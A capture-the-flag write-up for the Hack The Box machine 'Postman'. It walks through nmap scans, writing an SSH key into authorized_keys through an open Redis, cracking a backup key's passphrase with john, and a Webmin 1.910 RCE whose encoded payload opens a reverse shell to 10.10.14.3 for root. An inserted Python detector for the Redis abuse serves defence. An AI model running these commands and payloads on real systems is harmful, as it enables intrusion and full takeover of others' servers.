Disclaimer

The host penetrated in this article was legally authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the penetration approach described for any illegal purpose. I take no responsibility for any consequences arising from that and am not liable for any misuse or damage caused.

Service enumeration

Check open ports

┌──(rootkali)-[~/htb/Postman]
└─# nmap -p- 10.10.10.160 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:54 EST
Nmap scan report for 10.10.10.160
Host is up (0.31s latency).
Not shown: 64665 closed ports, 866 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

Check the port details

┌──(rootkali)-[~/htb/Postman]
└─# nmap -sV -T4 -A -O 10.10.10.160 -p 22,80,6379,10000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:57 EST
Nmap scan report for 10.10.10.160
Host is up (0.26s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   251.42 ms 10.10.14.1
2   253.03 ms 10.10.10.160

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.24 seconds

First, add the target's hostname to the hosts file:

echo "10.10.10.160 Postman" >> /etc/hosts

We can see that SSH is open, there is an HTTP service on port 80, 6379 is Redis, and port 10000 is Webmin.

Webmin has an RCE vulnerability, but it requires a login account and password.

┌──(rootkali)-[~/htb/Postman]
└─# searchsploit webmin 1.910
---------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ---------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit | linux/remote/46984.rb
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)         | linux/webapps/47330.rb
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Redis 4.0.9

This version of Redis appears to have an RCE, but the few exploits I tried all errored out with:

-ERR unknown command 'system.exec'

After searching around, I found this answer under a post:

The redis instance doesn't have MODULE command which is odd. If this is a CTF it might be intentional that the box creator removed it.

So the vulnerability was probably removed deliberately by the box creator.

On HackTricks I found a way to log into the target without a password by abusing Redis to write an SSH authorized_keys file. The steps are as follows:

  1. Log into Redis with the CLI
     redis-cli -h 10.10.10.160
  2. Use config get dir to get Redis's working directory

    ┌──(rootkali)-[~/htb/Postman]
    └─# redis-cli -h 10.10.10.160
    10.10.10.160:6379> config get dir
    1) "dir"
    2) "/var/lib/redis"

     Now we know Redis's data directory on the target is /var/lib/redis; this step mainly tells us where the SSH file will be written.
  3. On Kali, redirect the local id_rsa.pub into key.txt; note that it needs two blank lines on each side, so that the key sits on a line of its own inside the binary RDB dump
     (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
  4. Write the attacking machine's public key into the target's Redis under the key ssh_key
     cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
  5. Log into the target's Redis again and read back ssh_key; if it displays, the write succeeded

    ┌──(rootkali)-[~/htb/Postman]
    └─# redis-cli -h 10.10.10.160
    10.10.10.160:6379> GET ssh_key
    "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX....

  6. Set Redis's dir to the .ssh directory
     CONFIG SET dir /var/lib/redis/.ssh
  7. Set dbfilename to authorized_keys
     CONFIG SET dbfilename authorized_keys
  8. Save
     save
  9. Exit the Redis shell and log in over SSH

    ┌──(rootkali)-[~/htb/Postman]
    └─# ssh redis@10.10.10.160
    The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
    RSA key fingerprint is SHA256:FJdNat9qUrffCNDMV/0qF8efJdwa8NXW+iQ7NXuf/uk.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.10.160' (RSA) to the list of known hosts.
    Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
    redis@Postman:~$ id
    uid=107(redis) gid=114(redis) groups=114(redis)
    redis@Postman:~$ whoami
    redis
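As an added defensive example (not part of the original writeup), the following Python detector reads Redis MONITOR-style lines and flags the sequence just walked through: a public key staged with SET, CONFIG SET dir pointed at an .ssh (or cron/web) directory, CONFIG SET dbfilename set to authorized_keys, then SAVE. The sample lines are constructed; the paths and key fragments mirror this box's layout.

```python
import re
from collections import defaultdict
# One Redis MONITOR line looks like:  <epoch> [<db> <ip>:<port>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(\S+) \[(\d+) ([\d.:]+)\] (.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted args, honouring \" and \n escapes
SENSITIVE_DIRS = ('/.ssh', '/etc/cron', '/var/spool/cron', '/var/www')
KEY_MARKERS = ('ssh-rsa ', 'ssh-ed25519 ', 'ecdsa-sha2-')

def parse_monitor_line(line):
    """Return (timestamp, client_ip, [CMD, args...]) or None for non-MONITOR lines."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), m.group(3).rsplit(':', 1)[0], ARG_RE.findall(m.group(4))

def detect_authorized_keys_write(lines):
    """Alert when one source IP stages a public key, aims dir/dbfilename at an SSH, cron
    or web location, then SAVEs. Keyed by IP: the key is usually staged over a separate
    `redis-cli -x` connection, so per-connection state would miss it."""
    state, alerts = defaultdict(dict), []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, ip, args = parsed
        cmd, rest, st = args[0].upper(), args[1:], state[ip]
        if cmd == 'SET' and len(rest) >= 2 and any(k in rest[1] for k in KEY_MARKERS):
            st['key'] = rest[0]                       # a public key landed in a value
        elif cmd == 'CONFIG' and len(rest) >= 3 and rest[0].upper() == 'SET':
            name, value = rest[1].lower(), rest[2]
            if name == 'dir' and any(d in value for d in SENSITIVE_DIRS):
                st['dir'] = value
            elif name == 'dbfilename' and (value == 'authorized_keys' or value.endswith('.php')):
                st['dbfilename'] = value
        elif cmd in ('SAVE', 'BGSAVE') and 'dir' in st and 'dbfilename' in st:
            alerts.append({'ts': ts, 'source': ip, 'dir': st['dir'],
                           'dbfilename': st['dbfilename'], 'key_staged': 'key' in st})
            state.pop(ip)                             # reset so a repeat is a new alert
    return alerts

# Constructed MONITOR excerpt mirroring the writeup's sequence (not real capture data)
SAMPLE_MONITOR = """\
1640300001.100000 [0 10.10.14.3:40110] "SET" "ssh_key" "\\n\\n\\nssh-rsa AAAAB3Nz...CONSTRUCTED\\n\\n"
1640300002.200000 [0 10.10.14.3:40112] "config" "get" "dir"
1640300003.300000 [0 10.10.14.3:40112] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1640300004.400000 [0 10.10.14.3:40112] "CONFIG" "SET" "dbfilename" "authorized_keys"
1640300005.500000 [0 10.10.14.3:40112] "save"
1640300006.600000 [0 10.10.10.5:52000] "SET" "session:42" "ok"
1640300007.700000 [0 10.10.10.5:52000] "BGSAVE"
"""
```

The precondition disappears entirely when Redis is bound to localhost with requirepass set and CONFIG is renamed away (rename-command CONFIG ""), which is the fix to prefer over detection alone.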

user.txt is under the user Matt, and the redis account has no permission to read it.

Privilege escalation to Matt

Uploaded linpeas and found an id_rsa.bak file:

╔══════════╣ Backup files (limited 100)
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak

Convert it into a format that John can recognize:

┌──(rootkali)-[~/htb/Postman]
└─# /usr/share/john/ssh2john.py id_rsa > crask

Crack it with John:

┌──(rootkali)-[~/htb/Postman]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt crask
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2021-12-25 01:04) 0.1290g/s 1850Kp/s 1850Kc/s 1850KC/s a6_123..*7¡Vamos!
Session completed

But the key cannot be used to log in directly:

┌──(rootkali)-[~/htb/Postman]
└─# ssh -i id_rsa matt@10.10.10.160
Enter passphrase for key 'id_rsa': 
Connection closed by 10.10.10.160 port 22

So I tried switching to Matt directly with the password computer2008, and it worked:

redis@Postman:/opt$ su Matt
Password: 
Matt@Postman:/opt$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:/opt$ whoami
Matt

Privilege escalation to root

Webmin 1.910

Webmin is a web-based administration platform for Unix-like systems. Because it has to manage many parts of the system, it usually runs with root privileges.
We already know that this version of Webmin has an RCE, and now we also have the login credentials Matt:computer2008, so we can use this RCE to escalate privileges.

Use this RCE from GitHub.

First start a listener on Kali:

nc -lnvp 4242

Run the attack:

┌──(rootkali)-[~/htb/Postman]
└─# python3 exploit_poc.py --ip_address=10.10.10.160 --port=10000 --lhost=10.10.14.3 --lport=4242 --user=Matt --pass=computer2008
Webmin 1.9101- 'Package updates' RCE
[+] Generating Payload...
[+] Reverse Payload Generated : u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4zOjQyNDIiKTtTVERJTi0%2BZmRvcGVuKCRjLHIpOyR%2BLT5mZG9wZW4oJGMsdyk7d2hpbGUoPD4pe2lmKCRfPX4gLyguKikvKXtzeXN0ZW0gJDE7fX07Jw%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22&ok_top=Update+Selected+Packages
[+] Attempting to login to Webmin
[+] Login Successful
[+] Attempting to Exploit

The reverse shell comes back:

┌──(rootkali)-[~/htb/Postman]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.160] 36814
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

Privileges have been successfully escalated to root.